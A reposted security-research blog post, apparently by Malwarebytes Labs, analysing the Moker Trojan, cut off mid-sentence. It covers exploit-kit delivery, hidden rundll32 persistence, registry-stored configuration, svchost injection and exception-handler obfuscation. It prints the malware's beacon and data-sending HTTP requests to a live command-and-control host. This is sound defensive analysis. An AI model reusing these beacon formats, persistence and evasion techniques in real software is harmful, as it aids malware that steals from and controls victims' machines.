{"id":7411,"date":"2017-04-21T11:10:07","date_gmt":"2017-04-21T19:10:07","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/04\/21\/news-1202\/"},"modified":"2017-04-21T11:10:07","modified_gmt":"2017-04-21T19:10:07","slug":"news-1202","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2017\/04\/21\/news-1202\/","title":{"rendered":"Elusive Moker Trojan is back"},"content":{"rendered":"<p><strong>Credit to Author: Malwarebytes Labs| Date: Fri, 21 Apr 2017 18:44:58 +0000<\/strong><\/p>\n<p>Some time ago we observed a rare, interesting malware dropped from the Rig-v EK. Its code was depicting that it is written by professionals. Research has shown that it is a sample of <a href=\"https:\/\/www.trendmicro.com\/vinfo\/us\/threat-encyclopedia\/malware\/troj_moker.a\" target=\"_blank\">Moker<\/a>\u00a0Trojan that was discovered in 2015 (read more <a href=\"http:\/\/blog.ensilo.com\/moker-a-new-apt-discovered-within-a-sensitive-network\" target=\"_blank\">here<\/a>). However, for a long time, we could not find a sample with working CnC in order to do\u00a0a deeper research. Finally, we found such a sample &#8211; this article will be a deep dive in its capabilities.<\/p>\n<h3>Analyzed samples<\/h3>\n<ul>\n<li><strong><a href=\"https:\/\/www.hybrid-analysis.com\/sample\/af1bd82bf11e5a386abf5e1a1dc9773b66f7936f6e2e8f3ea4cc913794bf5a81?environmentId=100\" target=\"_blank\">76987e1882ef27faab675c4a5ce4248d<\/a> &#8211; main sample &#8211; dropped by EK (April 2017)<\/strong>\n<ul>\n<li><strong><a href=\"https:\/\/virustotal.com\/en\/file\/845992942501fe6fbb15df8392168d09f42e320f316c9649a914ec8b9c3b80ec\/analysis\/1491692602\/\" target=\"_blank\">f961bf2d0504e376b3305e9d06f66de3<\/a>\u00a0&#8211; the main module &#8211; DLL (stage 2)<\/strong><\/li>\n<\/ul>\n<\/li>\n<li><a href=\"https:\/\/virustotal.com\/en\/file\/164222d29856cba2d913e48ee36ef0d7b2fde943d7369437106317e4252f124c\/analysis\/\" target=\"_blank\">e63913d6d389a6bc5f2aa4036717ac27<\/a> &#8211; main sample (dropped by EK)\n<ul>\n<li>4d9f5048e225e8b4dd5feb8ec489e483 &#8211; unpacked payload (stage 1)<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>Downloaded modules:<\/p>\n<p><a href=\"https:\/\/virustotal.com\/en\/file\/2f41e714f582af5d044a3a88cd1d3f3cda0478fe1740769ca85b868490d74c77\/analysis\/1492036617\/\" target=\"_blank\">8997b9365c697e757f5a4717ec36fb2d<\/a> &#8211; <em>pluginj382dew1i.exe<\/em><\/p>\n<p><a href=\"https:\/\/virustotal.com\/en\/file\/4f674aef65836687b29635c01457c18d0ef87c2b4218a5ed88275dfa2ef0054f\/analysis\/1492036461\/\" target=\"_blank\">faf2135dc5311b034d31191694a52bbd<\/a> &#8211; <em>KB1080030.exe<\/em><\/p>\n<p>Reference samples (from 2015)<\/p>\n<ul>\n<li><a href=\"https:\/\/www.hybrid-analysis.com\/sample\/c6eef5fcccef671bbc6af65983974af14b1243edad0f73b45924aff4b19fe115?environmentId=1\" target=\"_blank\">9bdd2e72708584c9fd6761252c9b0fb8<\/a> &#8211; sample #1<\/li>\n<li><a href=\"https:\/\/virustotal.com\/en\/file\/2ed9022b917ddef85a699fd09e879fce8461c007006a5a11449e122269d5f5c7\/analysis\/\" target=\"_blank\">5f005beb917acfeb28e0a410909e6d6b<\/a> &#8211; sample #2\n<ul>\n<li><a href=\"https:\/\/virustotal.com\/en\/file\/2ed9022b917ddef85a699fd09e879fce8461c007006a5a11449e122269d5f5c7\/analysis\/\" target=\"_blank\">650ce9e81d7f86660e2d37cbde8f160a<\/a> &#8211; unpacked Stage 1<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<h3>Distribution method<\/h3>\n<p>We found Moker Trojan distributed via exploit kits &#8211; in malvertising campaigns, as well as dropped from the hacked sites. Example &#8211; Rig-v EK dropping Moker:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17488\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/rigv_dropping.png\" alt=\"\" width=\"918\" height=\"122\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/rigv_dropping.png 918w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/rigv_dropping-300x40.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/rigv_dropping-600x80.png 600w\" sizes=\"auto, (max-width: 918px) 100vw, 918px\" \/><\/p>\n<h3>Behavioral analysis<\/h3>\n<p>The malware injects itself into the <em>svchost<\/em>, and then contacts the CnC server.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17222\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/injected.png\" alt=\"\" width=\"442\" height=\"171\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/injected.png 442w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/injected-300x116.png 300w\" sizes=\"auto, (max-width: 442px) 100vw, 442px\" \/><\/p>\n<h4>Network communication<\/h4>\n<p>The communication is encrypted. The typical way of beaconing is to send the request to the address: <em>&lt;gate_name&gt;.php?img=&lt;number&gt; <\/em><br \/> An example of the sent request:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17280\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/request_1-1.png\" alt=\"\" width=\"654\" height=\"21\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/request_1-1.png 654w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/request_1-1-300x10.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/request_1-1-600x19.png 600w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/request_1-1-630x21.png 630w\" sizes=\"auto, (max-width: 654px) 100vw, 654px\" \/><\/p>\n<pre>GET \/nnnn04722.php?img=1 HTTP\/1.1  User-Agent: Mozilla  Host: bitmixc.ml  <\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17226\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/beacon.png\" alt=\"\" width=\"857\" height=\"409\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/beacon.png 857w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/beacon-300x143.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/beacon-600x286.png 600w\" sizes=\"auto, (max-width: 857px) 100vw, 857px\" \/><\/p>\n<p>The server responds with encrypted content (the bot saves it in a registry key). Then it injects itself in other applications and sends further requests, including the data of the infected machine, i.e.:<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/requests_2-3.png\" target=\"_blank\" data-rel=\"lightbox-0\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17283\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/requests_2-3.png\" alt=\"\" width=\"866\" height=\"70\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/requests_2-3.png 866w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/requests_2-3-300x24.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/requests_2-3-600x48.png 600w\" sizes=\"auto, (max-width: 866px) 100vw, 866px\" \/><\/a><\/p>\n<pre>GET \/nnnn04722.php?page=&lt;computername&gt;&lt;windows_version&gt;_&lt;disk_id&gt;&amp;s=&lt;number&gt;p=&lt;number&gt;.&lt;number&gt;&amp;err=&lt;number&gt;.&lt;number&gt;<\/pre>\n<p>In the below case, the response turned out to be a PE file (an updated version of the bot) obfuscated by XOR with a character &#8216;c&#8217;.<br \/> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17224\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/moker_comm.png\" alt=\"\" width=\"627\" height=\"613\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/moker_comm.png 627w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/moker_comm-300x293.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/moker_comm-600x587.png 600w\" sizes=\"auto, (max-width: 627px) 100vw, 627px\" \/><\/p>\n<p>The server responds either by sending some encrypted content or a number:<\/p>\n<pre>=&lt;number&gt;<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17231\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/resp_bytes.png\" alt=\"\" width=\"685\" height=\"347\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/resp_bytes.png 685w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/resp_bytes-300x152.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/resp_bytes-600x304.png 600w\" sizes=\"auto, (max-width: 685px) 100vw, 685px\" \/><\/p>\n<h4>Persistence<\/h4>\n<p>Moker achieves its persistence by adding a Run key in the registry. This method may look very simple at first. However, the authors of the malware hid\u00a0the real executable behind a legitimate Microsoft application &#8211; Rundl32.exe. Thanks to this trick, it is much harder to notice it &#8211; a popular tool used to examine persistent applications, <em>Sysinternals&#8217; autoruns<\/em>, does not show\u00a0such keys by default, assuming that they are harmless.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17271\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/moker_run_key.png\" alt=\"\" width=\"835\" height=\"155\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/moker_run_key.png 835w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/moker_run_key-300x56.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/moker_run_key-600x111.png 600w\" sizes=\"auto, (max-width: 835px) 100vw, 835px\" \/><\/p>\n<p>The sample of Moker is dropped in the current user&#8217;s home directory:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17269\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/moker_dropped.png\" alt=\"\" width=\"583\" height=\"210\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/moker_dropped.png 583w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/moker_dropped-300x108.png 300w\" sizes=\"auto, (max-width: 583px) 100vw, 583px\" \/><\/p>\n<p>If we take a closer look at the sample, we can see that it has been slightly modified in comparison to the original one &#8211; some encrypted information has been removed:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17478\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/cnc_addr_removed.png\" alt=\"\" width=\"892\" height=\"360\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/cnc_addr_removed.png 892w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/cnc_addr_removed-300x121.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/cnc_addr_removed-600x242.png 600w\" sizes=\"auto, (max-width: 892px) 100vw, 892px\" \/><\/p>\n<p>As it turned out after the further research (see in the part &#8220;Inside&#8221;), those bytes contains the CnC address, prefixed by a special tag. The information removed from the executable is not lost but stored elsewhere &#8211; in one of the registry keys created for storing the malware configuration.<\/p>\n<p>Other keys created by the malware are saved under &#8220;<em>..CLSID{448D3B34-8D3B-3B34-8D3B-48D3448D3B34}&#8221;:<\/em><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17479\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/keys_set1.png\" alt=\"\" width=\"864\" height=\"322\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/keys_set1.png 864w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/keys_set1-300x112.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/keys_set1-600x224.png 600w\" sizes=\"auto, (max-width: 864px) 100vw, 864px\" \/><\/p>\n<p>The full dump of the registry entries is available <a href=\"https:\/\/gist.githubusercontent.com\/hasherezade\/40157ab29c6b1001855a0589b1d5369a\/raw\/5987889557e092a8c35653881e2a78d940102d24\/moker.reg\" target=\"_blank\">here<\/a>.<\/p>\n<p>As it turned out, the encrypted CnC address, that was removed from the executable, is persisted in\u00a0 the registry, inside the key &#8220;5&#8221;:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17480\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/cnc_in_registry.png\" alt=\"\" width=\"451\" height=\"193\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/cnc_in_registry.png 451w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/cnc_in_registry-300x128.png 300w\" sizes=\"auto, (max-width: 451px) 100vw, 451px\" \/><\/p>\n<p>Compare with the data from inside the original sample:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17482\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/cnc_addr_in_sample.png\" alt=\"\" width=\"627\" height=\"136\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/cnc_addr_in_sample.png 627w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/cnc_addr_in_sample-300x65.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/cnc_addr_in_sample-600x130.png 600w\" sizes=\"auto, (max-width: 627px) 100vw, 627px\" \/><\/p>\n<p>Another key, &#8220;6&#8221;, stores a PE file (the executable dumped from the registry is available here: <a href=\"https:\/\/virustotal.com\/en\/file\/aec046984fd89902559db13fe1e2fab4c5a4c969eed6b6e59d617d109eed3ec9\/analysis\/1491351756\/\" target=\"_blank\">91f754c3fc475aed93e80575bb503c73<\/a>).<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17481\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/reg_pe_file.png\" alt=\"\" width=\"446\" height=\"326\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/reg_pe_file.png 446w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/reg_pe_file-300x219.png 300w\" sizes=\"auto, (max-width: 446px) 100vw, 446px\" \/><\/p>\n<p>The key &#8220;7&#8221; stores the data that was downloaded from the CnC after the initial beacon:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17312\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/server_resp_stored.png\" alt=\"\" width=\"455\" height=\"325\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/server_resp_stored.png 455w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/server_resp_stored-300x214.png 300w\" sizes=\"auto, (max-width: 455px) 100vw, 455px\" \/><\/p>\n<p>Compare with the content of the server response:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17313\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/server_resp.png\" alt=\"\" width=\"724\" height=\"654\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/server_resp.png 724w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/server_resp-300x271.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/server_resp-600x542.png 600w\" sizes=\"auto, (max-width: 724px) 100vw, 724px\" \/><\/p>\n<p>The key &#8220;10&#8221; contains the name of the downloaded module:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17309\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/plugin.png\" alt=\"\" width=\"446\" height=\"150\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/plugin.png 446w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/plugin-300x101.png 300w\" sizes=\"auto, (max-width: 446px) 100vw, 446px\" \/><\/p>\n<p>The new module is stored in <em>ProgramData<\/em>:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17308\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/dropped_plugin.png\" alt=\"\" width=\"585\" height=\"207\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/dropped_plugin.png 585w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/dropped_plugin-300x106.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/dropped_plugin-470x165.png 470w\" sizes=\"auto, (max-width: 585px) 100vw, 585px\" \/><\/p>\n<p>Its persistence is added also with the help of a Run key (in a similar way as\u00a0the previously described case):<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17310\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/plugin_persist1.png\" alt=\"\" width=\"765\" height=\"149\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/plugin_persist1.png 765w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/plugin_persist1-300x58.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/plugin_persist1-600x117.png 600w\" sizes=\"auto, (max-width: 765px) 100vw, 765px\" \/><\/p>\n<h3>Inside<\/h3>\n<p>Moker consists of two main modules. The <em>Stage 1<\/em>, that is a downloader, and the S<em>tage 2<\/em>, that is a DLL containing the core malicious features. The downloader injects itself, along with the unpacked shellcode, into the <em>svchost.exe<\/em>. The screenshot below shows an example of the infected memory pages inside the <em>svchost.exe<\/em>:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17483\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/injected_dll_shellcode.png\" alt=\"\" width=\"664\" height=\"582\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/injected_dll_shellcode.png 664w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/injected_dll_shellcode-300x263.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/injected_dll_shellcode-600x526.png 600w\" sizes=\"auto, (max-width: 664px) 100vw, 664px\" \/><\/p>\n<p>The injected shellcode is responsible for sending the initial beacon to the CnC. Then, if the CnC is active, the main DLL is downloaded and injected into the other processes. During the tests, all 32-bit applications running in the Medium integrity mode have been infected by the Moker DLL.<\/p>\n<h4>Stage 1<\/h4>\n<p>Let&#8217;s dive in the code, starting from the dropper &#8211; that is the Stage 1. This is the binary used for initiating the full infection process &#8211; originally delivered by exploit kits. Every sample comes packed by some crypter (crypters are different\u00a0for various samples so we will not describe this layer here).<\/p>\n<p>After defeating a stub of a crypter, we get another PE file &#8211; with a layout typical for Moker. The section .<em>text<\/em>, that &#8211; in normal cases is the first section of PE, in case of Moker comes as second:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17242\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/moker_layout.png\" alt=\"\" width=\"195\" height=\"213\" \/><\/p>\n<p>Section <em>.data<\/em> is very small in the raw file, but it is expanding in the virtual image. So, we can suspect that something more is unpacked there:<\/p>\n<h4><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17243\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/sections_rv.png\" alt=\"\" width=\"878\" height=\"564\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/sections_rv.png 878w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/sections_rv-300x193.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/sections_rv-600x385.png 600w\" sizes=\"auto, (max-width: 878px) 100vw, 878px\" \/><\/h4>\n<h5>Obfuscated execution flow<\/h5>\n<p>The internal structure of this module is very interesting. It has self-modifying code with execution based on VEH (Vectored Exception Handers). Execution starts from installing the handler:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17598\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/start_from_veh.png\" alt=\"\" width=\"416\" height=\"92\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/start_from_veh.png 416w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/start_from_veh-300x66.png 300w\" sizes=\"auto, (max-width: 416px) 100vw, 416px\" \/><\/p>\n<p>Instructions<em> IN<\/em> are used in various places in the code. Their role is to disrupt the continuity of the execution by triggering an exception. Then, execution is redirected to the previously installed handler. Depending on the variant of the instruction that triggered the exception, the context is changed in one of the few ways:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17601\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/exception_translator.png\" alt=\"\" width=\"557\" height=\"656\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/exception_translator.png 557w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/exception_translator-255x300.png 255w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/exception_translator-509x600.png 509w\" sizes=\"auto, (max-width: 557px) 100vw, 557px\" \/><\/p>\n<p>Context patching is used to obfuscate the execution flow. Thanks to this trick, static analysis of the code is almost impossible &#8211; all changes on the fly.<\/p>\n<p>The <em>JMP EAX<\/em> (first case in the exception handler) is used to deploy API calls. It is triggered by <em>IN AL, &lt;BYTE&gt;<\/em> (see the example below):<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17635\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/to_call_api.png\" alt=\"\" width=\"625\" height=\"275\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/to_call_api.png 625w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/to_call_api-300x132.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/to_call_api-600x264.png 600w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/to_call_api-195x85.png 195w\" sizes=\"auto, (max-width: 625px) 100vw, 625px\" \/><\/p>\n<p>That&#8217;s why, if we trace the API calls made by the application, we can notice that most of them are made from the same address in the code &#8211; only the target address is changing.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17232\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/api_calls_via_same_addr.png\" alt=\"\" width=\"674\" height=\"153\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/api_calls_via_same_addr.png 674w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/api_calls_via_same_addr-300x68.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/api_calls_via_same_addr-600x136.png 600w\" sizes=\"auto, (max-width: 674px) 100vw, 674px\" \/><\/p>\n<p>Not only the execution flow but also the code itself is dynamically modified. We can find the application calling very often <em>VirtualAlloc<\/em>:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17604\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/virtual_alloc.png\" alt=\"\" width=\"623\" height=\"123\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/virtual_alloc.png 623w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/virtual_alloc-300x59.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/virtual_alloc-600x118.png 600w\" sizes=\"auto, (max-width: 623px) 100vw, 623px\" \/><\/p>\n<p>Some pieces of the encrypted code are copied from the main executable into this dynamically allocated memory:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17613\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/coping_code.png\" alt=\"\" width=\"446\" height=\"279\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/coping_code.png 446w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/coping_code-300x188.png 300w\" sizes=\"auto, (max-width: 446px) 100vw, 446px\" \/><\/p>\n<p>Then, they are decrypted by a dedicated function:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17612\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/decrypting1.png\" alt=\"\" width=\"450\" height=\"475\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/decrypting1.png 450w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/decrypting1-284x300.png 284w\" sizes=\"auto, (max-width: 450px) 100vw, 450px\" \/><\/p>\n<p>The revealed code is almost ready &#8211; except for the addresses of calls, that needs to be filled. You can see in the following fragment, that temporarily the CALL points to its own address:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17617\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/addresses.png\" alt=\"\" width=\"382\" height=\"137\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/addresses.png 382w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/addresses-300x108.png 300w\" sizes=\"auto, (max-width: 382px) 100vw, 382px\" \/><\/p>\n<p>This\u00a0is fixed in another step &#8211; the decoding function returns into another code fragment, that modifies the addresses:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17615\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/more_modifications.png\" alt=\"\" width=\"395\" height=\"187\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/more_modifications.png 395w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/more_modifications-300x142.png 300w\" sizes=\"auto, (max-width: 395px) 100vw, 395px\" \/><\/p>\n<p>Till the new piece of code is fully revealed and ready to be called (see the fixed CALL target):<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17621\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/fixed_addr-1.png\" alt=\"\" width=\"436\" height=\"129\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/fixed_addr-1.png 436w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/fixed_addr-1-300x89.png 300w\" sizes=\"auto, (max-width: 436px) 100vw, 436px\" \/><\/p>\n<p>When the modifying function returns, execution falls into the line that performs a jump into the new code:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17619\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/jump_to_new-1.png\" alt=\"\" width=\"390\" height=\"132\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/jump_to_new-1.png 390w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/jump_to_new-1-300x102.png 300w\" sizes=\"auto, (max-width: 390px) 100vw, 390px\" \/><\/p>\n<p>The revealed code makes another layer &#8211; again allocating, decrypting and calling code.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-17622\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/next_layer.png\" alt=\"\" width=\"677\" height=\"685\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/next_layer.png 677w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/next_layer-296x300.png 296w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/04\/next_layer-593x600.png 593w\" sizes=\"auto, (max-width: 677px) 100vw, 677px\" \/><\/p>\n<p>The code chunks that provide some real functionality are always deployed via this type of proxy &#8211; that makes execution flow more complicated.<\/p>\n<h5>Functionality<\/h5>\n<p>The dropper starts execution from the defensive checks, ensuring that it is not run in the controlled environment. The following registry keys are 